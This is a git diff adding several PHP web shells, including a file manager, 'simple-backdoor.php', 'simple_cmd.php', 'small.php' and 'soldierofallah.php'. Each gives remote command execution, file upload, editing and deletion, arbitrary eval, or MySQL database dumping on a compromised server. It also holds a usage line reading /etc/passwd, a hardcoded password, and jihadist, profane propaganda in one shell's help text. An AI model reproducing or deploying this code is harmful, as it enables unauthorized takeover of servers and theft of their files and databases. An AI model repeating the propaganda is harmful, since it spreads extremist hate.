+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+
+		}
+
+		else {
+
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+
+		}
+
+		echo "</a></font></th>
+
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+
+		if (is_file($dir.$file))
+
+		{
+
+		echo "$fsize";
+
+		}
+
+		else {
+
+		echo "&nbsp; ";
+
+		}
+
+		echo "
+
+		</b></font></td>
+
+		<td width='103' align='center' nowrap>";
+
+		if (is_file($dir.$file)){
+
+		if (is_readable($dir.$file)){
+
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+
+		}else {
+
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+
+		 }
+
+		}else {
+
+		echo "&nbsp;";
+
+		 }
+
+		echo "
+
+		</a></font></td>
+
+		<td width='77' align='center' nowrap>";
+
+		if (is_file($dir.$file))
+
+		{
+
+		if (is_readable($dir.$file)){
+
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+
+		}else {
+
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+
+		 }
+
+		}else {
+
+		echo "&nbsp;";
+
+		 }
+
+		echo "
+
+		</a></font></td>
+
+		<td width='86' align='center' nowrap>";
+
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+
+		echo "<font size='1' color='#999999'>Dont in windows";
+
+		}
+
+		else {
+
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+
+		}
+
+		echo "</a></font></td>
+
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+
+	</tr>
+
+	";
+
+		      }
+
+		      closedir($dh);
+
+		    } 
+
+		    }
+
+		    echo "</table>
+
+<form enctype='multipart/form-data' action='' method='POST'>
+
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+
+ Send this file: <input name='userfile' type='file' />
+
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+
+ <input type='submit' value='Send File' />
+
+</form> 
+
+		    </div>";
+
+			}
+
+//Upload Files 
+
+$rpath=$_GET['dir'];
+
+if ($rpath <> "") {
+
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+
+print "<pre>";
+
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+
+echo "<script language='javascript'> history.back(2)</script>";
+
+}
+
+ }
+
+ //file deleted
+
+$frpath=$_GET['fdelete'];
+
+if ($frpath <> "") {
+
+if (is_dir($frpath)){
+
+$matches = glob($frpath . '/*.*');
+
+if ( is_array ( $matches ) ) {
+
+  foreach ( $matches as $filename) {
+
+  unlink ($filename);
+
+  rmdir("$frpath");
+
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+
+echo "<script language='javascript'> history.back(1)</script>";
+
+  }
+
+  }
+
+  }
+
+  else{
+
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+
+unlink ("$frpath");
+
+echo "<script language='javascript'> history.back(1)</script>";
+
+exit(0);
+
+
+
+  }
+
+  
+
+
+
+}
+
+			?>
+
+			
+
+			</td>
+
+		</tr>
+
+		<tr>
+
+			<td style="border: 1px dotted #FFCC66">
+
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+
+			Copyright 2004-Simorgh Security<br>
+
+			Edited By KingDefacer<br>
+
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+
+		<a style="TEXT-DECORATION: none" href="http://">
+
+		<font color="#666666"></font></a></font></td>
+
+		</tr>
+
+	</table>
+
+</div>
+
+
+
+</body>
+
+
+
+</html>
diff --git a/php/simple-backdoor.php b/php/simple-backdoor.php
new file mode 100644
index 0000000..bc0e778
--- /dev/null
+++ b/php/simple-backdoor.php
@@ -0,0 +1,17 @@
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/php/simple_cmd.php b/php/simple_cmd.php
new file mode 100644
index 0000000..6416588
--- /dev/null
+++ b/php/simple_cmd.php
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title>G-Security Webshell</title>
+</head>
+
+<body bgcolor=#000000 text=#ffffff ">
+<form method=POST>
+<br>
+<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" 
+style="background:#000000;color:#ffffff;">
+<hr>
+<pre>
+<? $cmd = $_REQUEST["-cmd"];?>
+<? if($cmd != "") print Shell_Exec($cmd);?>
+</pre>
+</form>
+</body>
+</html
diff --git a/php/small.php b/php/small.php
new file mode 100644
index 0000000..33e13d3
--- /dev/null
+++ b/php/small.php
@@ -0,0 +1,502 @@
+<?
+  ##########################################################
+ # Small Shell - Edited By KingDefacer                      #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, KingDefacer, Rebz, SkvoznoY      #
+ # All bugs -> alturks.com                                  #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Shell - Edited By KingDefacer</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<pre>
+<?
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
+else
+{
+$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
+if(@is_dir($work_dir))
+{
+echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
+$handle=@opendir($work_dir);
+if($handle)
+{
+while(false!==($fn=readdir($handle))){$files[]=$fn;};
+@closedir($handle);
+sort($files);
+$not_dirs=array();
+for($i=0;$i<sizeof($files);$i++)
+{
+$fn=$files[$i];
+if(is_dir($fn))
+{
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+else {$not_dirs[]=$fn;}
+}
+for($i=0;$i<sizeof($not_dirs);$i++)
+{
+$fn=$not_dirs[$i];
+echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); 
+if($winda===false)
+{
+$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
+$group=@posix_getgrgid(@filegroup($work_dir.$fn));
+printf("% 20s|% -20s",$owner['name'],$group['name']);
+}
+echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
+printf("% 20s ",@filesize($work_dir.$fn).'B');
+printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
+}
+echo('</pre><hr>');
+?>
+<form name='list' method=post>
+<input name='work_dir' type=hidden size=120><br>
+<input name='page' value='cmd' type=hidden>
+<input name='f_action' value='view' type=hidden>
+</form>
+<?
+} else echo('Error Listing '.$e_work_dir);
+}
+else
+switch($f_action)
+{
+case 'view':
+{
+echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
+$f=@fopen($work_dir,'r');
+?>
+<form method=post>
+<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
+<input name='page' value='cmd' type=hidden>
+<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
+<input name='f_action' value='save' type=submit>
+</form>
+<?
+break;
+}
+case 'save' :
+{
+$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
+$f=@fopen($work_dir,'w');
+if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
+else
+{
+fwrite($f,$file_text);
+fclose($f);
+echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
+}
+break;
+}
+}
+break;
+}
+break;
+}
+case 'upload' :
+{
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+$f=$_FILES["filename"]["name"];
+if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
+else
+{
+echo('file is uploaded in '.$e_work_dir);
+}
+break;
+}
+case 'download' :
+{
+$fname=isset($_POST['fname'])?$_POST['fname']:'';
+$temp_file=isset($_POST['temp_file'])?'on':'nn';
+$f=@fopen($fname,'r');
+if(!($f)) echo('file is not exists');
+else
+{
+$archive=isset($_POST['archive'])?$_POST['archive']:'';
+if($archive=='gzip')
+{
+Header("Content-Type:application/x-gzip\n");
+$s=gzencode(fread($f,filesize($fname)));
+Header('Content-Length: '.strlen($s)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
+echo($s);
+}
+else
+{
+Header("Content-Type:application/octet-stream\n");
+Header('Content-Length: '.filesize($fname)."\n");
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
+ob_start();
+while(feof($f)===false)
+{
+echo(fread($f,10000));
+ob_flush();
+}
+}
+}
+}
+}
+break;
+}
+case 'mysql' :
+{
+$action=isset($_POST['action'])?$_POST['action']:'query';
+$user=isset($_POST['user'])?$_POST['user']:'';
+$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
+$db=isset($_POST['db'])?$_POST['db']:'';
+$host=isset($_POST['host'])?$_POST['host']:'localhost';
+$query=isset($_POST['query'])?magic_q($_POST['query']):'';
+switch($action)
+{
+case 'dump' :
+{
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
+$archive=isset($_POST['archive'])?$_POST['archive']:'none';
+if($archive!=='none')$to_file=false;
+$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
+$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
+
+<h1>Edited By KingDefacer<h1>
diff --git a/php/soldierofallah.php b/php/soldierofallah.php
new file mode 100644
index 0000000..01741f1
--- /dev/null
+++ b/php/soldierofallah.php
@@ -0,0 +1,1303 @@
+<?php
+session_start();
+
+error_reporting(0);
+set_time_limit(9999999);
+
+$auth=1;
+$version = "1.0";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$password='alqaeda';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=5><center>In The Name Of Allah<center></b></font>
+&copy; by SoldiersofAllah
+
+We are here..
+Because this is our ideologi and our breath
+<br><br>
+Jihad is our way!!!
+Die as Syuhada or be a good moslem...
+<br><br>
+<font color="green">free for Palestine,iraq,Afghanistan,somalia,and every moslem country</font><br><br>
+<font color="red">No respect for nasionalism,democracy,capitalism,liberalism,n All ideology what contradiction in Al-Quran and sunnah
+Fuck to Israel,USA,UK,Indonesian government,Saudi government And Every government who always hating every mujahideen</font>
+
+=[]= Soldiers of Allah was here and controlling your system =[]=
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
